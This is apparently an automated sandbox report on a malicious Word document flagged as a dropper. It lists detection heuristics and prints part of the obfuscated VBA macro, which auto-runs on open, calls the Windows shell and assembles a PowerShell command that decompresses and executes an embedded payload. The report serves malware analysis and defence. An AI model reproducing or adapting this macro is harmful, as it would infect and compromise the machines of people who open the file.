Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro is designed to execute a command using the Windows shell, likely to download and run a secondary payload. The reconstructed command string indicates the use of PowerShell to achieve this, and the ClamAV detection further confirms its malicious nature.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6605185-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6605185-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE: Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18657 bytes | 0e490de2f2b04c9dd1dccb6e2f00eb9c4d4c8540821886835fc974cd02e6ab91 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "RMvlqDMwXTd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cTPqoo = (vTMBVk / oCUTt / 48354 / OLHRo / 93148 + jaffP)
OtAKN = (khbAn / TzfJVw / 47737 / OIHZA / 85388 + LtjWG)
bKUcYo = (dhkiXW / MPzihZ / 99468 / JPTIcW / 75213 + PoUXs)
wRrod = (Gwhjbz / qPSjm / 59682 / FJPMX / 82329 + UqCzw)
OPERnwwdXjd ("" + JTJjZpjjHdq + DRKjqwz + YcSTVV + rlqWB + pCwXMajVW + QpkVADQ + AZTZzWolNwG)
fRmfl = (ihfiP / zcvQiw / 78007 / nMwXq / 39367 + OOiQz)
End Sub
Attribute VB_Name = "KTiURJHuU"
Function YcSTVV()
On Error Resume Next
UNNwPf = IzkPP + dGpkq + (KMlbh / ccrVSw + TFIJW - hvEsib) + NIXQEB - RUhilj
UGYaEKwc = "po" + ImfmJwL + SDIUFTHzidUFbR + "w" + nwXZXqbvtw + poQwCTlzTzPNbm + "e" + SzhVOQWwouZ + NbJNIJuMYCI + "r" + BqiKwlswd + kkZSSIHtJ + "she" + VGzScDP + ZpvOfPdwokdkfu + "l" + kbuQuOWzvU + fJoijApu + "l" + mCiLFZrW + XurbUdAK + " " + TLnTRivuAiFhjZ + ljJzFZiRnlRMO + "( N" + ibqsbPK + dzVLGpKSmcr + "e" + WttjWjf + judaGtjOcbpj + "W-o" + DTKzawal + iEwwutiOMuQa + "Bj" + iQlXzQbQClq + iFOHvjtw + "EC" + iTjzaXYrdmfPJN + zINBLIhhvIwn + "T" + nijTDDPTAtduNa + vBEJjljAl + " i"
KZzzC = hiHMY + jtRiSr + (GdXFX / EOzlOs + soNEim - zJWjsF) + vaOBj - wVZmTZ
BBRZlV = wwiqKz + iHTYR + (GCcNzi / KBzji + RORiUr - dbjkF) + EoFiQb - ffzZE
XhuHc = "o.s" + kztTuFrfMzjJKw + MSQInikhLhXOb + "TRe" + YlDYZnY + DuBBAXlY + "AM" + HHzoFBNLHMidEb + YHXiDnGE + "rE" + jijowwwfdzawz + bRwiaqaG + "Ad" + iBkrTAsjNUiiTQ + ZzwhbJAWbWIa + "E" + GbooRzL + ziNkDhzz + "r"
LKwDY = YSlUYk + MOCqWO + (ujFwIK / GpaMG + HRGztZ - omioBE) + uEiPBQ - QcFwv
tRcJKX = ANQzs + EKNCq + (wnVlnz / NYzpiZ + jkldR - QwwwXM) + PIapi - SkGYf
KuGAKmRhZdw = "( (" + dKHSvduHC + cmHEQzDQcCHKKp + " Ne" + oBBwLXXITjiJQ + fREoaIYoArzlOW + "W" + dUmFFBzlFPwljP + dFbtGAA + "-o" + NAGOmImTj + dtriSSjLKnElz + "Bj" + IvGqcTEp + tWSGMRA + "EC" + WjOwbnR + dIPJRiAqMt + "T " + YEziYwQEzV + raZuwfCKihL + " i" + jEoGVEGhkziP + rBkaHEo + "O.C"
EGshqR = rtPtos + wbRztH + (uijdLJ / HDiwSN + AdXQQt - kzYNz) + mwqHu - NKbMD
dOvOiS = jZwVS + PQjZr + (SHPwk / LZcMh + kDsRz - cqPPUX) + wcllfY - bVZVO
zkplz = irwzt + dOYJfH + (MkGIM / BIAZY + UkIvU - ObqUho) + zaRvo - wEmTX
QrzZu = "omP" + TswUsfk + zRAzBmDn + "R" + ojZoznUpP + DhVbWWSzfw + "E" + anOYPaiVh + VStEwhY + "s" + knujfWiPko + dVwAjPEPhI + "s" + hzJdSTRHJrd + istvSltLjswvE + "iOn" + UZnbzOCjN + QWEKlsKHEWKUOX + ".D" + AGMhOEznjD + icMjtUVXHWHEk + "eF" + vJFYEBuB + TjMXRah + "La" + ccKdbuCYNi + zRtDdifw + "T" + amjZlIzpvZOP + ljiiBcjXarWS + "e"
owCrj = (BYzBIt / Xiaui * 95327 * SwzBw * DCLoD + 36437 * fBwWWj - hMjcVI - JoAzo + IBrwA)
OLhhz = (kuGlsA / wHJMQZ * 99977 * ifcBS * rzwJu + 76413 * wbXQcE - kpsjU - RnbqBJ + TjjFff)
owNIw = (DtVjDX / WdFMXj * 76132 * uOKqO * hiKCWa + 27084 * izbifF - nEzap - fwiZUI + ukDRj)
kJCIBvXMtG = "stR" + JczMwAfmwnVlRs + hsjEVFHlwQPvRk + "Eam" + VnjPjHbQHp + oFBotJwmB + "( [" + EUMQikjULqB + MWMZQSwjLuw + "SYS" + bCImKShLb + qtjYVjXmpX + "T" + zYViqvsaPa + hLYfiiSk + "Em" + jXmYKcXJAqwjK + kqQjUGPYWqJKr + ".io" + EsuHowwS + CGZdLBAKq + "." + CAHiTwPiBRfFt + lDZqnYj + "mE" + AqvLpIABF + rnYVzhk + "mor"
WAfrEP = (lzLSVh / idDDss * 33911 * zijOwi * qGozU + 90969 * KDHZL - BuwhK - qrwdrq + sABHpQ)
IFiXMt = (TzwThD / FhCEAo * 23543 * czHoCz * vRIsj + 86274 * SJzEIY - hYIdPv - FlQiV + cjPYq)
iOFNnndY = "Yst" + fKoWjQP + wfnwvZwK + "ReA" + pqjsOLi + tZNaNuCNUHfi + "m]" + iTzhRhHR + dVMwRaL + " [" + dzhjEaC + iCHakdCZ + "sy" + MiicLJzshDv + aabNwkuHOovmLw + "S" + jwsLhsZwWVaH + pPkGjzJQFp + "t" + wqipAMtHzG + PhBcqaJnaswf + "Em" + PDbSrDr + iPjVNOZXjMBrzw + ".C" + ifhwFsDnvw + fPzrEmSMKFw + "Onv" + VPSBMQE + NYKOpqMtZQYtsT + "ert"
nMjTP = (iHvkd / mjfkll * 4287 * hpzbAQ * fAHcvF + 82730 * EYaio - CTFNbG - knHHRm + wOETwt)
TWQCJ = "]:" + HifvJbMKHOkiW + YKovNzUdS + ":" + pTHfunvizfv +
... (truncated)